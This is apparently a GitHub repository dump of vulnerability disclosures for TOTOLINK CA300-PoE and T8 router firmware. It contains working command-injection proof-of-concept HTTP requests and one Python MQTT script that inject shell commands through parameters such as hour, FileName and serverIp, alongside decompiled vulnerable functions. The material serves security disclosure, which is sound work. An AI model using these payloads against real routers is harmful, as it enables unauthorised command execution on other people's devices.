https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/6.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/7.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/setNetworkDiag_NetDiagPingTimeOut.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingTimeOut parameter in the function setNetworkDiag 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingTimeOut": "4||ls;"} 42 | ``` 43 | 44 | ![image-20230112184654180](images/3.png) 45 | 46 | 47 | 48 | The function `setNetworkDiag` is used to set the corresponding variable 49 | 50 | ![image-20230112182605470](images/5.png) 51 | 52 | In function `showNetworkDiag` 53 | 54 | ![image-20230112182702672](images/6.png) 55 | 56 | step into function `getDiagInfo` 57 | 58 | ![image-20230112182800857](images/7.png) -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/6.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/7.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/images/8.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagTracertHop/setNetworkDiag_NetDiagTracertHop.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the function setNetworkDiag 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "1", "NetDiagTracertHop": "20||ls;"} 42 | ``` 43 | 44 | ![image-20230112184654180](images/3.png) 45 | 46 | 47 | 48 | The function `setNetworkDiag` is used to set the corresponding variable 49 | 50 | ![image-20230112182605470](images/5.png) 51 | 52 | In function `showNetworkDiag` 53 | 54 | ![image-20230112182702672](images/6.png) 55 | 56 | step into function `getDiagInfo`,`V11` is the value of `system.NetDiag.method` 57 | 58 | ![image-20230112192218163](images/7.png) 59 | 60 | ![image-20230112192317035](images/8.png) 61 | -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_hour/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_hour/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_hour/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_hour/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_hour/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_hour/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_hour/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_hour/images/4.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_hour/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_hour/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_hour/setRebootScheCfg_hour.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the hour parameter in the function setRebootScheCfg 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setRebootScheCfg`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl" :"setting/setRebootScheCfg","mode" : "1", "hour": "';mkdir /hour_1111;'"} 42 | ``` 43 | 44 | Folder created successfully 45 | 46 | ![image-20230112223707387](images/3.png) 47 | 48 | ``` 49 | int __fastcall setRebootScheCfg(int a1, int a2, int a3) 50 | { 51 | int mode_v; // $s5 52 | int week_v; // $s3 53 | const char *hour_v; // $fp 54 | const char *minute_v; // $s7 55 | int recHour_v; // $s0 56 | int v9; // $v0 57 | int v11; // $v0 58 | int i; // $s0 59 | _BYTE *v13; // $v0 60 | char *v14; // $a0 61 | int v15; // $s0 62 | int v16; // $s0 63 | char v19[256]; // [sp+2Ch] [-244h] BYREF 64 | char v20[128]; // [sp+12Ch] [-144h] BYREF 65 | char v21[128]; // [sp+1ACh] [-C4h] BYREF 66 | int v22[16]; // [sp+22Ch] [-44h] BYREF 67 | 68 | memset(v20, 0, sizeof(v20)); 69 | memset(v21, 0, sizeof(v21)); 70 | memset(v19, 0, sizeof(v19)); 71 | mode_v = websGetVar(a2, "mode", "0"); 72 | week_v = websGetVar(a2, "week", ""); 73 | hour_v = (const char *)websGetVar(a2, "hour", ""); 74 | minute_v = (const char *)websGetVar(a2, "minute", ""); 75 | recHour_v = websGetVar(a2, "recHour", "0"); 76 | cs_uci_set("system.reboot.mode", mode_v); 77 | cs_uci_set("system.reboot.week", week_v); 78 | cs_uci_set("system.reboot.hour", hour_v); 79 | cs_uci_set("system.reboot.minute", minute_v); 80 | cs_uci_set("system.reboot.recHour", recHour_v); 81 | cs_uci_commit("system"); 82 | strcpy(v19, "sed -i /reboot/d /etc/crontabs/root"); 83 | CsteSystem(v19, 0); 84 | CsteSystem("killall sche_reboot", 0); 85 | v9 = atoi(mode_v); 86 | if ( v9 == 1 ) // mode=1 87 | { 88 | v11 = atoi(week_v); 89 | if ( v11 == 255 ) 90 | { 91 | strcpy(v21, "*"); 92 | } 93 | else if ( v11 ) 94 | { 95 | for ( i = 1; i != 8; ++i ) 96 | { 97 | if ( ((atoi(week_v) >> i) & 1) != 0 ) 98 | { 99 | sprintf(v20, (const char *)&dword_4404, i); 100 | strcat(v21, v20); 101 | strcat(v21, &dword_4408); 102 | } 103 | } 104 | v13 = (_BYTE *)strrchr(v21, 44); 105 | if ( v13 ) 106 | *v13 = 0; 107 | } 108 | sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21); 109 | v14 = v19; 110 | LABEL_13: 111 | CsteSystem(v14, 0); 112 | goto LABEL_3; 113 | } 114 | if ( v9 == 2 ) 115 | { 116 | v15 = atoi(recHour_v); 117 | if ( v15 > 0 ) 118 | { 119 | sysinfo(v22); 120 | v16 = 3600 * v15 - v22[0]; 121 | if ( v16 <= 0 ) 122 | { 123 | cs_cmd("reboot", 16464, 1); 124 | goto LABEL_3; 125 | } 126 | CsteSystem("killall sche_reboot", 0); 127 | sprintf(v20, "sche_reboot %ld &", v16); 128 | v14 = v20; 129 | goto LABEL_13; 130 | } 131 | } 132 | LABEL_3: 133 | cs_cmd("/etc/init.d/cron", "restart", 2); 134 | websSetCfgResponse(a1, a3, "0", "reserv"); 135 | return 0; 136 | } 137 | ``` 138 | 139 | ![image-20230112223054684](images/4.png) 140 | 141 | ![image-20230112223826938](images/5.png) -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_minute/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_minute/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_minute/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_minute/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_minute/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_minute/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_minute/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_minute/images/4.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setRebootScheCfg_minute/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setRebootScheCfg_minute/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUnloadUserData/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUnloadUserData/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUnloadUserData/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUnloadUserData/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUnloadUserData/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUnloadUserData/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUnloadUserData/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUnloadUserData/images/4.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUnloadUserData/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUnloadUserData/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUnloadUserData/setUnloadUserData.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin_version parameter in the function setUnloadUserData 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setUnloadUserData`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl" : "setting/setUnloadUserData", "plugin_version": "|mkdir /setUnloadUserData_2222;"} 42 | ``` 43 | 44 | Folder created successfully 45 | 46 | ![image-20230113110150511](images/3.png) 47 | 48 | ![image-20230113110232520](images/4.png) 49 | 50 | ![image-20230113125903358](images/5.png) -------------------------------------------------------------------------------- /totolink_ca300-poe/setUploadUserData/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUploadUserData/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUploadUserData/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUploadUserData/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUploadUserData/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUploadUserData/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUploadUserData/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUploadUserData/images/4.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUploadUserData/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setUploadUserData/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setUploadUserData/setUploadUserData.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the FileName parameter in the function setUploadUserData 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setUploadUserData`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl" : "setting/setUploadUserData", "ContentLength":"10485", "FileName": "a|mkdir /setUploadUserData_1111;"} 42 | ``` 43 | 44 | Folder created successfully 45 | 46 | ![image-20230113105118320](images/3.png) 47 | 48 | ``` 49 | int __fastcall setUploadUserData(int a1, int a2, int a3) 50 | { 51 | const char *FileName_v; // $s3 52 | int ContentLength_v; // $s1 53 | int Object; // $s0 54 | int v9; // $s1 55 | int v10; // $v0 56 | int v11; // $s1 57 | const char *v13; // $a0 58 | int String; // $v0 59 | int v15; // $s2 60 | int v16; // $s0 61 | char v17[256]; // [sp+24h] [-104h] BYREF 62 | 63 | FileName_v = (const char *)websGetVar(a2, "FileName", ""); 64 | ContentLength_v = websGetVar(a2, "ContentLength", ""); 65 | set_action(3); 66 | Object = cJSON_CreateObject(); 67 | v9 = strtol(ContentLength_v, 0, 10); 68 | if ( v9 < 1000 ) 69 | { 70 | v13 = "MSG_userData_error"; 71 | goto LABEL_7; 72 | } 73 | if ( v9 >= 1048577 ) 74 | { 75 | v13 = "MSG_userData_big"; 76 | LABEL_7: 77 | String = cJSON_CreateString(v13); 78 | cJSON_AddItemToObject(Object, "upgradeERR1", String); 79 | unlink(FileName_v); 80 | set_action(0); 81 | goto LABEL_5; 82 | } 83 | if ( !fork(0) ) 84 | { 85 | sleep(2); 86 | memset(v17, 0, sizeof(v17)); 87 | v15 = malloc(v9); 88 | v16 = f_read(FileName_v, v15, 0, v9); 89 | if ( CS_DBG == 1 ) 90 | printf("(%s:%d)=> inLen=[%d]\n", "setUploadUserData", 350, v16); 91 | f_write("/tmp/plugin.tar.gz", v15, v16, 0); 92 | free(v15); 93 | sprintf(v17, "md5sum %s | awk '{ print $1 }' > %s", "/tmp/plugin.tar.gz", "/userdata/SysPluginMd5"); 94 | CsteSystem(v17, 0); 95 | CsteSystem("tar zxvf /tmp/plugin.tar.gz -C /tmp", 0); 96 | CsteSystem("sh /tmp/plugin/plugin.sh", 0); 97 | CsteSystem("rm -rf /tmp/plugin.tar.gz", 0); 98 | sprintf(v17, "rm -rf %s", FileName_v); 99 | CsteSystem(v17, 0); 100 | set_action(0); 101 | exit(1); 102 | } 103 | v10 = cJSON_CreateString("1"); 104 | cJSON_AddItemToObject(Object, "upgradeStatus", v10); 105 | LABEL_5: 106 | v11 = cJSON_Print(Object); 107 | websGetCfgResponse(a1, a3, v11); 108 | cJSON_Delete(Object); 109 | free(v11); 110 | return 0; 111 | } 112 | ``` 113 | 114 | 115 | 116 | ![image-20230113105039525](images/4.png) 117 | 118 | ![image-20230113125732755](images/5.png) -------------------------------------------------------------------------------- /totolink_ca300-poe/telnet_hard_code/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/telnet_hard_code/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/telnet_hard_code/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/telnet_hard_code/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/telnet_hard_code/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/telnet_hard_code/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/telnet_hard_code/telnet_hard_code.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a hard code password for the telnet service stored in the component /etc/config/product.ini 2 | 3 | ## Description 4 | 5 | There is a hard code password for telnet in **/etc/config/product.ini** 6 | 7 | ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | ![image-20230113112528725](images/3.png) -------------------------------------------------------------------------------- /totolink_t8/firmware/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.web: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/firmware/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.web -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/1.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/2.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/3.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/4.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/5.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/meshSlaveDlfw.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function meshSlaveDlfw of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function meshSlaveDlfw of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | The `T8` router opens the `MQTT` service 24 | 25 | ![image-20230116185238612](images/5.png) 26 | 27 | In function `meshSlaveDlfw`,The "serverIp" parameter does not filter user input, which can cause command injection vulnerabilities 28 | 29 | 30 | 31 | ![image-20230116192028632](images/3.png) 32 | 33 | POC 34 | 35 | ``` 36 | import paho.mqtt.client as mqtt 37 | client = mqtt.Client() 38 | client.connect("192.168.0.1",1883,60) 39 | client.publish("totolink/router/meshSlaveDlfw", b'{"serverIp": "|ls>/tmp/meshSlaveDlfw.txt|"}') 40 | ``` 41 | 42 | ![image-20230116192100698](images/4.png) -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/1.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/2.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/3.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/4.png: -------------------------------------------------------------------------------- 